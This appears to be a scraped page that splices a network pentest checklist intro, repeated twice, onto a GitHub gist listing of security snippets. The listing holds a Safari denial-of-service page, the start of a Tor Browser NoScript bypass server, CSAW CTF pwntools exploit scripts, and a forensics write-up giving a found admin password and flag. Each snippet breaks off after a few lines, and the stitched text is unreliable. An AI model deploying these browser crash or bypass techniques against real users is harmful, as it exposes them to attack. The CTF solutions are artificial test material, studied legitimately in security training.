Hello Dear Reader,
there are very few technical network security assessment checklist.
So I thought to share my own on this. Have a look and enjoy.
Lets talk about the scope first. If you are given a 1000 machines to perform VAPT, then here is your scope.
Single machine can have 65535 ports open. Any single port can deploy any service software from the world.
For example FTP can be run on smartftp, pureftpd etc..
Any single FTP software version (for example pureftpd 1.0.22) can have number of vulnerabilities available.
So if you multiply all of these, then it is impossible for any auditor to go ahead and probe all ports manually and find services manually.
Even if he/she is able to do it, it is impossible to check all vulnerabilities that are pertaining to a single port of a single machine.
Hence we have to rely on scanners such as nexpose, nessus, openvas, coreimpact etc.
Soufiane Boussali MrMugiwara
🇲🇦
MrMugiwara
/ safari-reaper.html
Created
September 17, 2018 15:26
Safari DoS ☠️ (Original tweet: https://twitter.com/pwnsdx/status/1040944750973595649, try it: https://cdn.rawgit.com/pwnsdx/ce64de2760996a6c432f06d612e33aea/raw/fb78440ee4bce427f0cde98a4e9feadfd9eed198/safari-reaper.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | |
| <style> | |
| body { | |
| background: repeat url('data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/7QCIUGhvdG9zaG9wIDMuMAA4QklNBAQAAAAAAGscAVoAAxslRxwCAAACAAAcAnQAV8KpIENoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbGQgLSBodHRwOi8vd3d3LnJlZGJ1YmJsZS5jb20vcGVvcGxlL0NoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA9tYAAQAAAADTLUhQICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFjcHJ0AAABUAAAADNkZXNjAAABhAAAAGx3dHB0AAAB8AAAABRia3B0AAACBAAAABRyWFlaAAACGAAAABRnWFlaAAACLAAAABRiWFlaAAACQAAAABRkbW5kAAACVAAAAHBkbWRkAAACxAAAAIh2dWVkAAADTAAAAIZ2aWV3AAAD1AAAACRsdW1pAAAD+AAAABRtZWFzAAAEDAAAACR0ZWNoAAAEMAAAAAxyVFJDAAAEPAAACAxnVFJDAAAEPAAACAxiVFJDAAAEPAAACAx0ZXh0AAAAAENvcHlyaWdodCAoYykgMTk5OCBIZXdsZXR0LVBhY2thcmQgQ29tcGFueQAAZGVzYwAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAABJzUkdCIElFQzYxOTY2LTIuMQAAAAAAAA |
MrMugiwara
/ TorBrowser_7.x_NoScript_bypass.py
Created
September 13, 2018 10:50
— forked from x0rz/TorBrowser_7.x_NoScript_bypass.py
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer | |
| PORT_NUMBER = 31337 | |
| class myHandler(BaseHTTPRequestHandler): | |
| #Handler for the GET requests | |
| def do_GET(self): | |
| self.send_response(200) |
MrMugiwara
/ serial_misc50.py
Created
September 17, 2017 23:22
— forked from faidamine/serial_misc50.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #usr/bin/python | |
| #Faid Mohammed Amine | |
| #Fb : piratuer | |
| from pwn import * | |
| import sys | |
MrMugiwara
/ rev_realism400.py
Created
September 17, 2017 23:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from z3 import * | |
| orig = [0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70] | |
| shuf = [0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64] | |
| x = [0xb8, 0x13, 0x0, 0xcd, 0x10, 0xf, 0x20, 0xc0, 0x83, 0xe0, 0xfb, 0x83, 0xc8, 0x2, 0xf, 0x22] | |
| d = [0x270,0x211,0x255,0x229,0x291,0x25E,0x233,0x1F9,0x278,0x27B,0x221,0x209,0x25D,0x290,0x28F,0x2DF] |
MrMugiwara
/ SCV_pwn100.py
Created
September 17, 2017 23:21
— forked from faidamine/SCV_pwn100.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #usr/bin/python | |
| #Faid Mohammed Amine | |
| #Fb : piratuer | |
| from pwn import * | |
| libc = ELF("libc-2.23.so") | |
| r = remote("pwn.chal.csaw.io", 3764) |
MrMugiwara
/ Pilot_pwn75.py
Created
September 17, 2017 23:21
— forked from faidamine/Pilot_pwn75.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #usr/bin/python | |
| #Faid Mohammed Amine | |
| #Fb : piratuer | |
| from pwn import * | |
| con = remote('pwn.chal.csaw.io',8464) | |
| con.recvuntil("Location:") |
MrMugiwara
/ best_router_for200.txt
Created
September 17, 2017 23:21
— forked from faidamine/best_router_for200.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Extracting Files (16 Go) | |
| Using FTK Imager and go to (var/www/) | |
| You will find login.pl & index.pl & username.txt & password.txt | |
| login ( admin : iforgotaboutthemathtest ) | |
| flag : flag{but_I_f0rgot_my_my_math_test_and_pants} | |
| #!/usr/bin/perl | |
| if ($ENV{'REQUEST_METHOD'} eq "POST") { |
Hi dear reader, there are very few technical network security assessment checklist. So I thought to share my own on this. Have a look and enjoy. Lets talk about the scope first. If you are given a 1000 machines to perform VAPT, then here is your scope. Single machine can have 65535 ports open. Any single port can deploy any service software from the world. For example FTP can be run on smartftp, pureftpd etc.. Any single FTP software version (for example pureftpd 1.0.22) can have number of vulnerabilities available. So if you multiply all of these, then it is impossible for any auditor to go ahead and probe all ports manually and find services manually. Even if he/she is able to do it, it is impossible to check all vulnerabilities that are pertaining to a single port of a single machine. Hence we have to rely on scanners such as nexpose, nessus, openvas, coreimpact etc. Here are some quick tools and test cases that one can perform on commonly found ports in the network pentest.
MrMugiwara
/ web-servers.md
Created
April 27, 2017 22:10
— forked from willurd/web-servers.md
Big list of http static server one-liners
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000NewerOlder